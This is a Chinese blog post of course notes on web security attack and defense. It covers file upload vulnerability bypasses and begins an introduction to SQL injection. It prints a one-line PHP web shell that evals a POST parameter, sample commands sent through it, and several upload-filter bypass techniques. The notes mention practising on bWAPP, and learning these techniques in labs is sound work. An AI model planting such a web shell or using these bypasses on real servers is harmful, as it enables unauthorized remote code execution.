<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="逻千的博客"><title>Web网络安全 - 极客时间 | 逻千</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="/css/dark.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/normalize.css/normalize.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/../../img/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/../../img/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.css"><meta name="generator" content="Hexo 5.4.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">Web网络安全 - 极客时间</h1><a id="logo" href="/.">逻千</a><p class="description">0825区手艺与生活</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/movie_book/"><i class="fa fa-book"> 影书单</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">Web网络安全 - 极客时间</h1><div class="post-meta">2021-03-01<span> | </span><span class="category"><a href="/categories/techology/">techology</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E7%9A%84%E5%B7%A5%E5%85%B7"><span class="toc-number">1.</span> <span class="toc-text">常用的工具</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-%E5%90%8E%E7%AB%AF%E5%AE%89%E5%85%A8"><span class="toc-number">2.</span> <span class="toc-text">Web 后端安全</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.1.</span> <span class="toc-text">文件上传漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9D%E9%98%B6%EF%BC%9A%E5%90%8E%E7%BC%80%E5%90%8D%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.1.</span> <span class="toc-text">初阶：后缀名绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%AD%E9%98%B6%EF%BC%9A3%E7%A7%8D"><span class="toc-number">2.1.2.</span> <span class="toc-text">中阶：3种</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%AB%98%E9%98%B6%EF%BC%9A3%E7%A7%8D"><span class="toc-number">2.1.3.</span> <span class="toc-text">高阶：3种</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL-%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.2.</span> <span class="toc-text">SQL 注入漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-%E5%BA%94%E7%94%A8%E4%B8%89%E5%B1%82%E6%9E%B6%E6%9E%84"><span class="toc-number">2.2.1.</span> <span class="toc-text">Web 应用三层架构</span></a></li></ol></li></ol></li></ol></div></div><div class="post-content"><p>极客时间的 <strong>web网络安全攻防实战</strong> 课程记录</p>
<p>web 安全的根本性原因是 <code>前端输入不可信</code></p>
<h1 id="常用的工具"><a href="#常用的工具" class="headerlink" title="常用的工具"></a>常用的工具</h1><ul>
<li><strong>Burp-Suite</strong>: Burp Suite Professional is one of the most popular penetration testing and vulnerability finder tools</li>
<li><strong>cURL</strong>: 系统自带</li>
<li><strong>Postman</strong>: GUI式cURL</li>
<li><strong>Wappalyzer</strong>: 网站技术栈分析</li>
<li><strong>HackBar</strong>: web安全工具插件</li>
</ul>
<h1 id="Web-后端安全"><a href="#Web-后端安全" class="headerlink" title="Web 后端安全"></a>Web 后端安全</h1><h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h2><p>举个例子，后端服务器若为 <code>PHP</code>，那么可以上传一个 <code>shell.php</code> 文件，里面包含</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># shell.php</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 通过php，调用 post 请求中的 hacker 参数</span></span><br><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;hacker&#x27;</span>]); <span class="meta">?&gt;</span>  </span><br></pre></td></tr></table></figure>

<p>一旦文件上传成功，即可把下面的命令加入 <code>post</code> 请求体</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 任意 Post 请求的请求体</span></span><br><span class="line"></span><br><span class="line">hacker=<span class="built_in">echo</span> getcwd()</span><br><span class="line">hacker=<span class="built_in">echo</span> get_current_user()</span><br></pre></td></tr></table></figure>

<p>工具： </p>
<ul>
<li>可以用 <code>中国菜刀</code>，一个 win 平台的工具</li>
<li>使用 <code>Docker</code> 运行 bWAPP 平台练习</li>
</ul>
<h3 id="初阶：后缀名绕过"><a href="#初阶：后缀名绕过" class="headerlink" title="初阶：后缀名绕过"></a>初阶：后缀名绕过</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 修改 shellp.php 的名字</span></span><br><span class="line">cp  shell.php  shell.php3    <span class="comment"># True</span></span><br><span class="line"></span><br><span class="line">cp  shell.php  shell.php30   <span class="comment"># False</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 如何探究其原因</span></span><br><span class="line"></span><br><span class="line">-&gt; netstate 命令 (获取 Program name，例 Apache2)</span><br><span class="line">-&gt; 找到 Apache 配置文件 `Apache.config`</span><br><span class="line">-&gt; 找到 module 加载配置</span><br><span class="line">-&gt; 找到 php5.conf 配置文件</span><br><span class="line">-&gt; 发现 &lt;FilesMatch <span class="string">&quot;.+\.ph(p[345]?|t|tml)$&quot;</span>&gt; 正则匹配</span><br></pre></td></tr></table></figure>


<h3 id="中阶：3种"><a href="#中阶：3种" class="headerlink" title="中阶：3种"></a>中阶：3种</h3><ol>
<li><p>前端验证绕过</p>
<p> 很多 CMS(content management system) 都只在前端用 js 来做校验</p>
<p> 漏洞利用流程  </p>
<ol>
<li>通过 Burp Suite 抓包，修改内容后放行 <code>常见</code></li>
<li>通过 Chrome 禁止or删除 js 代码 </li>
</ol>
</li>
<li><p><code>.htaccess</code> 绕过</p>
<ul>
<li>前提：web server 支持 <code>.htaccess</code> 分布式配置文件</li>
<li>原理：使用此文件绕过 <code>黑名单过滤</code></li>
<li>例子：比如黑名单限制上传 <code>php</code> 文件，但是上传 <code>jpg</code> 文件，利用 <code>.htaccess</code> 告诉目前文件夹可以去解析某一类文件。</li>
<li>用 <code>php</code> 解析 <code>jpg</code></li>
</ul>
</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">白名单过滤：不能使用，因为 .htaccess 无法上传</span><br><span class="line">黑名单过滤：只要没有限制 .htaccess 就可以上传，伪装为 .test （例）</span><br></pre></td></tr></table></figure>

<ol start="3">
<li><p>大小写绕过</p>
<ul>
<li>Windows: 大小写<code>不敏感</code></li>
<li>Linux: 大小写<code>敏感</code></li>
</ul>
</li>
</ol>
<img src="web-security-1.png" width="40%" />

<h3 id="高阶：3种"><a href="#高阶：3种" class="headerlink" title="高阶：3种"></a>高阶：3种</h3><ul>
<li><code>文件流绕过</code>，针对 windows 文件流</li>
<li><code>字符串截断</code>，当拼接目录时</li>
<li><code>文件头检测</code>，(绕过白名单，需要检测文件内容时，注意不要有乱码)</li>
</ul>
<h2 id="SQL-注入漏洞"><a href="#SQL-注入漏洞" class="headerlink" title="SQL 注入漏洞"></a>SQL 注入漏洞</h2><p>是发生于 <code>应用程序与数据库</code> 的安全漏洞  </p>
<p>实际情况中，需要结合用户的输入<code>动态构造SQL语句</code>，导致此时有SQL注入风险</p>
<p>提交网页时，主要分 GET方法，POST方法</p>
<h3 id="Web-应用三层架构"><a href="#Web-应用三层架构" class="headerlink" title="Web 应用三层架构"></a>Web 应用三层架构</h3><p>界面层 + 业务逻辑层 + 数据访问层</p>
<img src="web-security-2.png" width="70%" />


<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">具体案例</span><br></pre></td></tr></table></figure>

<img src="web-security-3.png" width="70%" />
</div><div class="tags"></div><div class="post-nav"><a class="next" href="/2020/04/01/alibaba-intern/">阿里淘系 intern offer 后的小总结</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/techology/">techology</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/03/01/web-security/">Web网络安全 - 极客时间</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/04/01/alibaba-intern/">阿里淘系 intern offer 后的小总结</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2021 <a href="/." rel="nofollow">逻千.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0" async></script><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.css"><script type="text/javascript" src="/js/copycode.js" successtext="复制成功!"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>